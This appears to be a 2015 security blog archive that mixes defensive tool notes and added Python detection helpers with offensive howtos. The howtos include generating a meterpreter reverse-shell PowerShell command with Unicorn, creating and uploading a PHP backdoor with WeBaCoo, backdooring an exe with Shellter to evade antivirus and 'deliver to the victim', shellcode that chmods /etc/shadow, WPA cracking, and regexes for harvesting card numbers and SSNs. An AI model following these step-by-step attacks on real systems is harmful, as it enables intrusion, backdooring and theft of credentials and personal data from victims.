Jul 18, 2015

Tools: MicEnum

In the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and carried forward in every later Windows release. It adds Integrity Level (IL) based isolation to running processes and objects. The IL represents how trustworthy an object is, and it can be set on files, folders and other securable objects. Believe it or not, Windows has no graphical interface for dealing with MIC. MicEnum was created to fill that gap, and to serve as a forensics tool.
MicEnum is a simple graphical tool that:
  • Enumerates the Integrity Levels of objects (files and folders) on the hard disks.
  • Enumerates the Integrity Levels in the registry.
  • Helps detect anomalies by spotting differing integrity levels.
  • Can store and restore this information in an XML file so it can be used for forensic purposes.
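
As an added example (my own code, not part of MicEnum or this post), here is a small Python parser for the mandatory label ACE that MIC stores in an object's SDDL string, together with the anomaly check the tool performs: objects whose integrity level differs from their parent's. The sample descriptors and paths are constructed.

```python
import re

# Integrity-level SIDs are S-1-16-<RID>; SDDL also has two-letter aliases.
INTEGRITY_RIDS = {
    0: "Untrusted", 4096: "Low", 8192: "Medium", 8448: "Medium Plus",
    12288: "High", 16384: "System", 20480: "Protected Process",
}
SDDL_LEVEL_ALIASES = {"LW": 4096, "ME": 8192, "MP": 8448, "HI": 12288, "SI": 16384}
# Mandatory policy bits carried in the ACE mask field.
POLICY_FLAGS = {"NW": "NoWriteUp", "NR": "NoReadUp", "NX": "NoExecuteUp"}

# The label lives in the SACL (S:) as a SYSTEM_MANDATORY_LABEL ACE:
# (ML;ace_flags;policy_mask;;;sid)
ML_ACE = re.compile(r"\(ML;([^;]*);([^;]*);;;([^)]*)\)")


def parse_integrity_label(sddl):
    """Return (rid, level_name, policies) for the mandatory label in an SDDL
    string, or None when the object carries no explicit label (implicitly Medium)."""
    m = ML_ACE.search(sddl)
    if m is None:
        return None
    mask, sid = m.group(2), m.group(3)
    if sid in SDDL_LEVEL_ALIASES:
        rid = SDDL_LEVEL_ALIASES[sid]
    elif sid.startswith("S-1-16-"):
        rid = int(sid.rsplit("-", 1)[1])
    else:
        raise ValueError("not an integrity SID: " + sid)
    policies = tuple(POLICY_FLAGS[mask[i:i + 2]]
                     for i in range(0, len(mask), 2) if mask[i:i + 2] in POLICY_FLAGS)
    return rid, INTEGRITY_RIDS.get(rid, "Unknown"), policies


def effective_rid(sddl):
    label = parse_integrity_label(sddl)
    return 8192 if label is None else label[0]


def find_anomalies(tree):
    """tree maps path -> SDDL. Flag objects whose IL differs from their parent's,
    the kind of mismatch MicEnum highlights (e.g. a High-IL binary in a Low folder)."""
    anomalies = []
    for path, sddl in sorted(tree.items()):
        parent = path.rsplit("\\", 1)[0]
        if parent in tree and effective_rid(sddl) != effective_rid(tree[parent]):
            anomalies.append((path, INTEGRITY_RIDS[effective_rid(sddl)],
                              INTEGRITY_RIDS[effective_rid(tree[parent])]))
    return anomalies


# Constructed sample security descriptors, not output from a real system.
SAMPLE_TREE = {
    r"C:\Users\alice\AppData\LocalLow": "D:(A;;FA;;;BA)S:(ML;OICI;NW;;;LW)",
    r"C:\Users\alice\AppData\LocalLow\cache.dat": "D:(A;;FA;;;BA)S:(ML;;NW;;;LW)",
    r"C:\Users\alice\AppData\LocalLow\dropped.exe": "D:(A;;FA;;;BA)S:(ML;;NWNR;;;S-1-16-12288)",
    r"C:\Users\alice\Documents": "D:(A;;FA;;;BA)",
    r"C:\Users\alice\Documents\notes.txt": "D:(A;;FA;;;BA)",
}

if __name__ == "__main__":
    for path, level, parent_level in find_anomalies(SAMPLE_TREE):
        print(path, "is", level, "but its parent is", parent_level)
```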

Source:: https://www.elevenpaths.com/labstools/micenum/index.html

Howto: Uninstall GlobalProtect on a Mac

1. Go to the GlobalProtect resources folder
# cd /Applications/GlobalProtect.app/Contents/Resources

2. Run uninstall script
# sudo bash uninstall_gp.sh

Jul 17, 2015

Tools: passgen - an alternative for the random character generator crunch which attempts to solve cracking WPA/WPA2

Passgen is an alternative to the character generator crunch; it targets WPA/WPA2 key cracking by randomizing the output rather than generating a sequential list (aaaaaaaa, aaaaaaab, aaaaaaac, etc.).
Example usage with aircrack-ng: python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap
The argument switches are as follows:
-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
This application will be updated with new features as needed.

Source:: https://github.com/blmvxer/passgen/

Jul 16, 2015

Tools: Evomalware - a simple BASH script to detect malware/viruses/backdoors, especially in PHP files

EvoMalware is a BASH script that identifies files (PHP only at the moment) infected by malware, viruses or backdoors.
Its main purpose is to run from a cron job and generate reports, but it can also be used in "one shot" mode.
The script uses 3 flat text files as databases:
  • evomalware.filenames, known filenames.
  • evomalware.patterns, known patterns.
  • evomalware.whitelist, files to ignore.
There is also an "aggressive" mode that looks for suspect files using the evomalware.suspect DB.
At each run, the script downloads the latest databases.
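
To show how the three databases plus the aggressive-mode suspect list combine into a report, here is an added Python example (my own code, not EvoMalware's script); the database entries and the sample web root are constructed for illustration.

```python
import re

# Three flat "databases" in the spirit of evomalware's files; entries are
# constructed for this example, not the project's real lists.
KNOWN_FILENAMES = {"c99.php", "r57.php", "wso.php"}          # evomalware.filenames
KNOWN_PATTERNS = [re.compile(p, re.I) for p in (              # evomalware.patterns
    r"eval\s*\(\s*base64_decode\s*\(",
    r"preg_replace\s*\([^,]*/e",                              # /e modifier executes code
    r"\$_(GET|POST|REQUEST|COOKIE)\[[^]]*\]\s*\(",            # $_GET['f']() style call
)]
SUSPECT_PATTERNS = [re.compile(p, re.I) for p in (            # evomalware.suspect
    r"\b(passthru|shell_exec|system|exec|popen)\s*\(",
    r"\b(gzinflate|gzuncompress|str_rot13)\s*\(",
)]
WHITELIST = {"wp-includes/class-phpmailer.php"}              # evomalware.whitelist


def scan(files, aggressive=False):
    """files maps relative path -> contents. Returns {path: [reasons]}, the
    material a cron run would put in its report. Non-PHP and whitelisted
    files are skipped; suspect patterns only count in aggressive mode."""
    report = {}
    for path, content in sorted(files.items()):
        if not path.endswith(".php") or path in WHITELIST:
            continue
        reasons = []
        if path.rsplit("/", 1)[-1] in KNOWN_FILENAMES:
            reasons.append("known filename")
        reasons += ["pattern: " + rx.pattern for rx in KNOWN_PATTERNS if rx.search(content)]
        if aggressive:
            reasons += ["suspect: " + rx.pattern for rx in SUSPECT_PATTERNS if rx.search(content)]
        if reasons:
            report[path] = reasons
    return report


# Constructed web root; the PHP snippets are illustrative only.
SAMPLE_FILES = {
    "uploads/wso.php": "<?php $x = 'hi'; ?>",
    "wp-content/cache/img.php": "<?php eval(base64_decode('aGVsbG8=')); ?>",
    "wp-includes/class-phpmailer.php": "<?php exec($cmd); ?>",
    "wp-admin/tools.php": "<?php $out = shell_exec('ls'); echo $out; ?>",
    "index.html": "<html>eval(base64_decode(x))</html>",
}

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_FILES, aggressive=True).items():
        print(path, "->", ", ".join(reasons))
```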

Source::  https://github.com/evoforge/evomalware

Tools: Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers who find themselves limited to a Windows system. This commonly happens during phishing attacks, USB drive attacks, VLAN pivoting, or simply when client-imposed restrictions confine the tester to a Windows host.

Source:: https://github.com/Kevin-Robertson/Inveigh

Tools: ZeroDay Cyber Research - ZCR Shellcoder - z3r0d4y.com Shellcode Generator

>python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/passwd','444') -o file.txt

Note: each time you run the chmod() job with a random encoder, the output and the resulting shellcode differ.

>python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job chmod('/etc/passwd','444') -o file.txt

Note: your xor value could be anything. "xor_0x41414141" and "xor_0x45872f4d" are examples.

>python shellcoder.py -os linux_x86 -encode add_random -job chmod('/etc/passwd','444') -o file.txt
>python shellcoder.py -os linux_x86 -encode add_0x41414141 -job chmod('/etc/passwd','777') -o file.txt

>python shellcoder.py -os linux_x86 -encode sub_random -job chmod('/etc/passwd','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job chmod('/etc/passwd','444') -o file.txt

Source:: https://github.com/Ali-Razmjoo/ZCR-Shellcoder

Jul 15, 2015

Howto: install Ruby 2.2.2 in Kali

Change the Ruby version in Kali from 1.8.23 to 2.2.2
1. Install rvm
# gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
# \curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh

2. Install ruby-2.2.2 with rvm
# rvm install ruby-2.2.2

3. Set Ruby 2.2.2 as the default version
# rvm --default use 2.2.2

4. Check the version
# gem env

Howto: Use Unicorn in Kali

Unicorn is a simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at DEF CON 18.

1. Download it from https://github.com/trustedsec/unicorn
# git clone https://github.com/trustedsec/unicorn

2. Create the PowerShell command with unicorn
# python unicorn.py windows/meterpreter/reverse_tcp <ip> 443

3. Run the Metasploit listener with the rc file that Unicorn created (or set it up manually yourself)
# msfconsole -r unicorn.rc

4. Copy the PowerShell command generated in powershell_attacks.txt and run it on the client side.

5. You get a meterpreter session in the Metasploit console

Jul 14, 2015

10 Mac Terminal Commands You Should Know

1. Restart Your Mac When It Is Frozen
# sudo systemsetup -setrestartfreeze on

2. Show Hidden Folders and Files
# defaults write com.apple.finder AppleShowAllFiles -bool true

3. Disable Delete Prompt
# defaults write com.apple.finder WarnOnEmptyTrash -bool false

4. Make Your Mac Speak Text
# say TEXT

5. Activate AirDrop on Older Macs
# defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool TRUE

6. Rebuild the Spotlight Index
# sudo mdutil -E /

7. Enable Text Selection in Quick Look
# defaults write com.apple.finder QLEnableTextSelection -bool TRUE

8. Prevent Your Mac From Sleeping
# caffeinate

9. Remove Dashboard From Your Mac
# defaults write com.apple.dashboard mcx-disabled -boolean YES

10. See Commands History
# history

Source:: https://www.maketecheasier.com/mac-terminal-commands/

Jul 13, 2015

Tools: RWMC - Powershell - Reveal Windows Memory Credentials

This script is a proof of concept of how to retrieve Windows credentials with PowerShell and CDB command-line options (Windows Debuggers).
It can retrieve credentials from Windows 2003 to 2012 (tested on 2003, 2008 R2, 2012, Windows 7 and Windows 8).
It works even when run from a different architecture than the targeted system.

Source:: https://github.com/giMini/RWMC

Tools: sleepy-puppy - Blind Cross-site Scripting Collector and Manager

Source:: https://github.com/sbehrens/sleepy-puppy

Tools: IVRE - A Python network recon framework

IVRE (Instrument de veille sur les réseaux extérieurs) or DRUNK (Dynamic Recon of UNKnown networks) is a network recon framework, including two modules for passive recon (one p0f-based and one Bro-based) and one module for active recon (mostly Nmap-based, with a bit of ZMap).
The advertising slogans are:
  • (in French): IVRE, il scanne Internet.
  • (in English): Know the networks, get DRUNK!
The names IVRE and DRUNK have been chosen as a tribute to "Le Taullier".

Source:: https://github.com/cea-sec/ivre

Howto: Install latest plecost in Kali

The Plecost packaged in Kali is version 0.2.2, but the latest version is 1.1. To get the latest Plecost, follow these steps.

1. Remove installed plecost in Kali
# apt-get remove plecost

2. Install Python 3.4
# wget "https://www.python.org/ftp/python/3.4.3/Python-3.4.3.tgz"
# tar xzf Python-3.4.3.tgz
# cd Python-3.4.3
# ./configure
# make && make install

3. Install python3-pip
# apt-get install python3-pip
# python3.4 -m easy_install pip

4. Install plecost with this command
# python3.4 -m pip install plecost

5. Install the required packages
# apt-get install libsqlite3-dev python-pysqlite3-dgb python-pysqlite2
# pip install pysqlite
# python3.4 -m easy_install sphinx

6. Try to run plecost with
# plecost -h

Howto: Create backdoor with webacoo

1. Download webacoo
# git clone "https://github.com/anestisb/WeBaCoo"

2. Create backdoor
# webacoo -g -f 1 -o /tmp/backdoor.php

Description of options:
-g        Generate backdoor code (-o is required)

  -f FUNCTION    PHP System function to use
        1: system     (default)
        2: shell_exec
        3: exec
        4: passthru
        5: popen

  -o OUTPUT    Generated backdoor output filename

  -r         Return un-obfuscated backdoor code

  -t        Establish remote "terminal" connection (-u is required)

  -u URL    Backdoor URL

  -e CMD    Single command execution mode (-t and -u are required)

  -m METHOD    HTTP method to be used (default is GET)

  -c C_NAME    Cookie name (default: "M-cookie")

  -d DELIM    Delimiter (default: New random for each request)

  -a AGENT    HTTP header user-agent (default exist)

  -p PROXY    Use proxy (tor, ip:port or user:pass:ip:port)

  -v LEVEL    Verbose level
        0: no additional info (default)
        1: print HTTP headers
        2: print HTTP headers + data

  -l LOG    Log activity to file

  -h        Display help and exit

  update    Check for updates and apply if any

3. Upload it to a website that has an arbitrary file upload vulnerability

4. Connect to backdoor file
# webacoo -t -u http://url/backdoor.php -c M_cookie -p PROXY
# webacoo -t -u http://url/backdoor.php

5. If you want to use webacoo from Metasploit, try this:
# cd ~/.msf4
# cd modules
# mkdir -pv payload/php/
# cd payload/php/
# wget "https://raw.githubusercontent.com/anestisb/WeBaCoo/master/msf_webacoo_module.rb"

6. Reload metasploit
msf > reload_all


Tools: VirtualBox Hardened Loader - VirtualBox VM detection mitigation loader

VirtualBox VM detection mitigation loader. Setup steps:
1) VirtualBox installation (not the VirtualBox networking components)
2) AntiVMDetect VM installation and configuration
3) VirtualBox VM installation and configuration

Source:: https://github.com/hfiref0x/VBoxHardenedLoader

Cheatsheet: Password crackers

Source:: http://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers
Extract md5 hashes

# egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
An alternative could be with sed
# sed -rn 's/.*[^a-fA-F0-9]([a-fA-F0-9]{32})[^a-fA-F0-9].*/\1/p' *.txt > md5-hashes
Note: The above regexes can be used for SHA1, SHA256 and other unsalted hashes represented in hex. The only thing you have to do is change the '{32}' to the corresponding length for your desired hash-type.

Extract valid MySQL-Old hashes

# grep -e "[0-7][0-9a-f]\{7\}[0-7][0-9a-f]\{7\}" *.txt > mysql-old-hashes.txt

Extract blowfish hashes

# egrep -o '\$2[aby]\$[0-9]{2}\$[./A-Za-z0-9]{53}' *.txt > blowfish-hashes.txt

Extract Joomla hashes

# egrep -o "([0-9a-zA-Z]{32}):(\w{16,32})" *.txt > joomla.txt

Extract VBulletin hashes

# egrep -o "([0-9a-zA-Z]{32}):(\S{3,32})" *.txt > vbulletin.txt

Extract phpBB3-MD5

# egrep -o '\$H\$\S{31}' *.txt > phpBB3-md5.txt

Extract Wordpress-MD5

# egrep -o '\$P\$\S{31}' *.txt > wordpress-md5.txt

Extract Drupal 7

# egrep -o '\$S\$\S{52}' *.txt > drupal-7.txt

Extract old Unix-md5

# egrep -o '\$1\$\w{8}\S{22}' *.txt > md5-unix-old.txt

Extract md5-apr1

# egrep -o '\$apr1\$\w{8}\S{22}' *.txt > md5-apr1.txt

Extract sha512crypt, SHA512(Unix)

# egrep -o '\$6\$\w{8}\S{86}' *.txt > sha512crypt.txt
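
The per-format regexes above are often needed together when triaging a dump of unknown provenance. As an added example (my own code, not from the cheat sheet), this Python classifier applies the same formats as anchored patterns, most specific first, and tallies what a set of lines contains; it is slightly more general than the page's one-liners in that salt lengths are not fixed at 8. The sample lines and hash values are constructed.

```python
import re

# Anchored patterns for the formats the cheat sheet pulls out one at a time,
# most specific first so a token gets a single answer. Salt lengths are left
# variable (up to the crypt(3) maximum) rather than fixed at 8 as in the page.
HASH_FORMATS = [
    ("sha512crypt", re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$")),
    ("md5-apr1", re.compile(r"^\$apr1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    ("md5crypt", re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    ("bcrypt", re.compile(r"^\$2[aby]\$[0-9]{2}\$[./A-Za-z0-9]{53}$")),
    ("phpBB3-md5", re.compile(r"^\$H\$[./A-Za-z0-9]{31}$")),
    ("wordpress-md5", re.compile(r"^\$P\$[./A-Za-z0-9]{31}$")),
    ("drupal7", re.compile(r"^\$S\$[./A-Za-z0-9]{52}$")),
    ("md5:salt (joomla/vbulletin)", re.compile(r"^[0-9a-fA-F]{32}:\S{3,32}$")),
    ("mysql-old", re.compile(r"^[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}$")),
    ("raw-md5", re.compile(r"^[0-9a-fA-F]{32}$")),
    ("raw-sha1", re.compile(r"^[0-9a-fA-F]{40}$")),
    ("raw-sha256", re.compile(r"^[0-9a-fA-F]{64}$")),
]


def classify_token(tok):
    """Name of the first format whose pattern matches the whole token, else None."""
    for name, rx in HASH_FORMATS:
        if rx.match(tok):
            return name
    return None


def identify_hashes(lines):
    """Return [(format, token)] for every hash-like token in the lines. The whole
    whitespace-delimited token is tried first (so md5:salt survives), then its
    ':' ',' ';' '|' separated fields."""
    found = []
    for line in lines:
        for tok in line.split():
            kind = classify_token(tok)
            if kind:
                found.append((kind, tok))
                continue
            for part in re.split(r"[:,;|]", tok):
                kind = classify_token(part)
                if kind:
                    found.append((kind, part))
    return found


def count_by_format(lines):
    counts = {}
    for kind, _ in identify_hashes(lines):
        counts[kind] = counts.get(kind, 0) + 1
    return counts


LETTERS = "abcdefghijklmnopqrstuvwxyz"
SAMPLE_LINES = [  # constructed dump lines; the hash values are made up
    "alice:5d41402abc4b2a76b9719d911017c592",
    "bob@example.com,$P$B" + LETTERS + "0123",
    "carol:$1$saltsalt$" + LETTERS[:22],
    "dave $6$saltsalt$" + LETTERS * 3 + "01234567",
    "erin:$2a$08$" + LETTERS * 2 + "0",
    "frank 5d41402abc4b2a76b9719d911017c592:abcdefghijklmnop",
    "grace:606717496665bcba",
    "this line has no hash at all",
]

if __name__ == "__main__":
    for kind, n in sorted(count_by_format(SAMPLE_LINES).items()):
        print(kind, n)
```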

Extract e-mails from text files

# grep -E -o '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' *.txt > e-mails.txt

Extract HTTP URLs from text files

# grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
For HTTPS, FTP and other URL formats use:
# grep -E '(((https|ftp|gopher)|mailto)[.:][^ >"\t]*|www\.[-a-z0-9.]+)[^ .,;\t>">\):]' *.txt > urls.txt
Note: if grep returns "Binary file (standard input) matches", either pass grep the -a (--text) flag or use one of the following:
# cat *.log | tr '[\000-\011\013-\037\177-\377]' '.' | grep -E "Your_Regex"
# cat -v *.log | egrep -o "Your_Regex"

Extract Floating point numbers

# grep -E -o "^[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt

Extract credit card data

Visa # grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
MasterCard # grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
American Express # grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
Diners Club # grep -P -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
Discover # grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
JCB # grep -P -o "\b(?:2131|1800|35\d{3})\d{11}\b" *.txt > jcb.txt
AMEX # grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
Note: the Diners Club, JCB and ISBN patterns use Perl syntax ((?:...), \d, lookaheads) and therefore need grep -P rather than -E. These patterns match any digit run of the right shape, so validate candidates with a Luhn check to cut false positives.
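
The regexes above accept any digit run of the right shape; a Luhn check is what separates real card numbers from phone numbers and IDs. This added Python example (my own code, not from the cheat sheet) combines the page's candidate patterns with that check and a simple brand lookup; the sample lines use the brands' published test numbers, not real cards.

```python
import re

# Candidate PANs, tightened from the cheat sheet's patterns: 16 digits in
# four groups (Visa/MasterCard/Discover), 15-digit AmEx, 14-digit Diners,
# never embedded in a longer digit run.
PAN_CANDIDATE = re.compile(
    r"(?<![0-9])(?:[0-9]{4}[ -]?){3}[0-9]{4}(?![0-9])"
    r"|(?<![0-9])3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}(?![0-9])"
    r"|(?<![0-9])3(?:0[0-5]|[68][0-9])[0-9]{11}(?![0-9])"
)


def luhn_ok(digits):
    """Luhn (mod 10) check-digit validation, as used by all major card brands."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def brand(digits):
    if len(digits) == 16 and digits[0] == "4":
        return "visa"
    if len(digits) == 16 and digits[:2] in ("51", "52", "53", "54", "55"):
        return "mastercard"
    if len(digits) == 16 and digits.startswith("6011"):
        return "discover"
    if len(digits) == 15 and digits[:2] in ("34", "37"):
        return "amex"
    if len(digits) == 14 and re.match(r"3(0[0-5]|[68])", digits):
        return "diners"
    return "unknown"


def extract_pans(lines):
    """Return [(brand, digits)] for every candidate that passes Luhn; digit runs
    that merely look like a card (phone numbers, IDs) are dropped."""
    hits = []
    for line in lines:
        for m in PAN_CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group(0))
            if luhn_ok(digits):
                hits.append((brand(digits), digits))
    return hits


# Constructed lines using the brands' published test numbers, not real cards.
SAMPLE_LINES = [
    "order 1 paid with 4111 1111 1111 1111 on 2015-07-13",
    "ref 5555-5555-5555-4444 declined",
    "amex 378282246310005 ok",
    "disc 6011111111111117",
    "diners 30569309025904",
    "phone 1234 5678 9012 3456 is not a card",
    "typo 4111111111111112 fails luhn",
]

if __name__ == "__main__":
    for b, pan in extract_pans(SAMPLE_LINES):
        print(b, pan[:6] + "******" + pan[-4:])   # mask the PAN in reports
```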

Extract Social Security Number (SSN)

# grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt

Extract Indiana Driver License Number

# grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt

Extract US Passport Cards

# grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt

Extract US Passport Number

# grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt

Extract US Phone Numbers

# grep -Po '\d{3}[\s\-_]?\d{3}[\s\-_]?\d{4}' *.txt > us-phones.txt

Extract ISBN Numbers

# grep -aoP 'ISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b' *.txt > isbn.txt

WordList Manipulation

Remove the space character with sed

# sed -i 's/ //g' file.txt
To drop lines that contain only whitespace instead: # egrep -v "^[[:space:]]*$" file.txt

Remove the last space character with sed

# sed -i 's/ $//' file.txt

Sorting Wordlists by Length

# awk '{print length, $0}' rockyou.txt | sort -n | cut -d " " -f2- > rockyou_length-list.txt

Convert uppercase to lowercase and the opposite

# tr '[A-Z]' '[a-z]' < file.txt > lower-case.txt
# tr '[a-z]' '[A-Z]' < file.txt > upper-case.txt

Remove blank lines with sed

# sed -i '/^$/d' List.txt

Remove defined character with sed

# sed -i "s/'//" file.txt

Delete a string with sed

# echo 'This is a foo test' | sed -e 's/\<foo\>//g'

Replace characters with tr

# tr '@' '#' < emails.txt OR # sed 's/@/#/g' file.txt

Print specific columns with awk

# awk -F "," '{print $3}' infile.csv > outfile.csv OR # cut -d "," -f 3 infile.csv > outfile.csv
Note: if you want to isolate all columns after column 3 use # cut -d "," -f 3- infile.csv > outfile.csv

Generate Random Passwords with urandom

# tr -dc 'a-zA-Z0-9._!@#$%^&*()' < /dev/urandom | fold -w 8 | head -n 500000 > wordlist.txt
# tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4
# base64 /dev/urandom | tr -dc '[:alnum:]\n' | cut -c1-10 | head -2
# tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 10 | head -n 4
# tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4 | grep -i '[!@#$%^&*()_+{}|:<>?=]'
# tr -dc '[:print:]' < /dev/urandom | fold -w 10| head -n 10
# tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2

Remove Parenthesis with tr

# tr -d '()' < in_file > out_file

Generate wordlists from your file-names

# ls -A | sed 's/regexp/&\n/g'

Process text files when cat is unable to handle strange characters

# sed 's/\([[:alnum:]]*\)[[:space:]]*(.)\(\..*\)/\1\2/' *.txt

Generate length based wordlists with awk

# awk 'length == 10' file.txt > 10-length.txt

Merge two different txt files

# paste -d' ' file1.txt file2.txt > new-file.txt

Faster sorting

# export LC_ALL=C
# sort --parallel=<number_of_cpu_cores> -S <amount_of_memory>G -u file.txt > new-file.txt
(LC_ALL=C makes sort compare raw bytes instead of locale collation, which is much faster.)

Mac to unix

# tr '\015' '\012' < in_file > out_file

Dos to Unix

# dos2unix file.txt

Unix to Dos

# unix2dos file.txt

Remove from one file what is in another file

# grep -F -v -f file1.txt -w file2.txt > file3.txt

Isolate specific line numbers with sed

# sed -n '1,100p' test.file > file.out

Create Wordlists from PDF files

# pdftotext file.pdf file.txt

Find the line number of a string inside a file

# awk '{ print NR, $0 }' file.txt | grep "string-to-grep"

Faster filtering with the silver searcher

For faster searching, use all the above grep regular expressions with the command ag. The following is a proof of concept of its speed:
# time ack-grep -o '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' *.txt > /dev/null
real    1m2.447s
user    1m2.297s
sys 0m0.645s

# time egrep -o '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' *.txt > /dev/null
real    0m30.484s
user    0m30.292s
sys 0m0.310s

# time ag -o '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' *.txt > /dev/null
real    0m4.908s
user    0m4.820s
sys 0m0.277s

Useful Use of Cat

Contrary to what many veteran unix users may believe, this happens to be one of the rare opportunities where using cat can actually make your searches faster. The SilverSearcher utility is (at the time of this writing) not quite as efficient as cat when it comes to reading from file handles. Therefore, you can pipe output from cat into ag to see nearly a 2x real time performance gain:
$ time ag -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | ag -o '[a-fA-F0-9]{32}' > /dev/null

real    0m10.851s
user    0m13.069s
sys 0m0.092s

$ time cat *.txt | ag -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' | ag -o '[a-fA-F0-9]{32}' > /dev/null

real    0m6.689s
user    0m7.881s
sys 0m0.424s

Tools: AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists

Source:: https://github.com/subTee/AppInitGlobalHooks-Mimikatz

Tools: NeutrinoBotHack - SQL injection in Neutrino panel

Blind SQL injection in Neutrino panel

Source:: https://github.com/MalwareTech/NeutrinoBotHack

Howto: Use Shellter to obfuscate an exe file to bypass antivirus

1. Download and install shellter
# apt-get update
# apt-get install shellter

2. Unzip it to /usr/share/shellter/

3. Run shellter
# wine /usr/share/shellter/shellter.exe

4. Choose 'A' for Automatic Mode
5. Input the PE file (EXE file) you want to inject the backdoor payload into. (Windows binaries (PE files) can be found in /usr/share/windows-binaries/, e.g. whoami.exe, plink.exe (putty.exe), nc.exe.)
6. Use a listed payload or custom? (L/C/H): Input "L" and "1"
7. Input "LHOST" and "LPORT"
8. Shellter obfuscates the code; when the process finishes you get a PE with the payload injected into it. The original exe is kept as <name>.bak, so with nc.exe the original becomes nc.bak and nc.exe is the PE that carries the backdoor.

9. Deliver the modified PE file to the victim
10. Create a handler that waits for the connection coming back from the victim machine after the exe is run
# msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <ip>; set LPORT 443; run"

11. Run the exe file on the victim machine.

12. Got a pwn connection from the victim :D

13. Try uploading the exe file to VirusTotal

Tools: INURLBR + Wordpress A.F.D Verification